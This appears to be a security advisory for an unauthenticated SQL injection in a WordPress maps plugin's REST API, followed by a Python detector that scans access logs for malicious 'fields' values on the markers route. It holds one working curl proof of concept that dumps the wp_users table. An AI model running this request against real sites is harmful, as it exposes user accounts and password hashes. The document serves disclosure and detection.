The includes/class.rest-api.php file in the REST API does not sanitize field names before using them in a SELECT statement, leading to an unauthenticated SQL injection issue.
curl -k --silent "http://example.com/index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%7D&fields=*+from+wp_users+--+-"
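A detection check for the request pattern above, as an added example that is not part of the original advisory or the plugin's code: it scans web access-log lines for calls to the wpgmza markers route whose fields parameter holds anything other than bare column names. The log lines are constructed, and the comma-separated fields format and the fields[] array form are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

ROUTE = "/wpgmza/v1/markers"  # REST route taken from the request shown above
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\Z")  # one bare column name
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # combined log format

def suspicious_fields(url):
    """Return the decoded fields tokens that are not plain column names."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)  # decodes %xx and turns '+' into a space
    route = query.get("rest_route", [""])[0]
    # The route arrives either as ?rest_route=... or under the /wp-json/ path.
    if ROUTE not in route and ROUTE not in parts.path:
        return []
    bad = []
    # Assumption: fields is sent comma-separated or as repeated fields[] keys.
    for value in query.get("fields", []) + query.get("fields[]", []):
        for token in value.split(","):
            token = token.strip()
            if token and not IDENT.match(token):
                bad.append(token)
    return bad

def scan(lines):
    """Return (line_number, offending_tokens) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            bad = suspicious_fields(match.group(1))
            if bad:
                hits.append((number, bad))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?rest_route='
    '/wpgmza/v1/markers/&filter=%7B%7D&fields=id,title,lat,lng HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?rest_route='
    '/wpgmza/v1/markers/&filter=%7B%7D&fields=*+from+wp_users+--+- HTTP/1.1" 200 4096',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-json/wp/v2/posts'
    '?fields=*+x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, tokens in scan(SAMPLE_LOG):
        print(f"line {number}: non-identifier fields value(s): {tokens}")
```

Access logs normally record only the query string, so a request that carries the same parameter in a POST body would not be seen by this check.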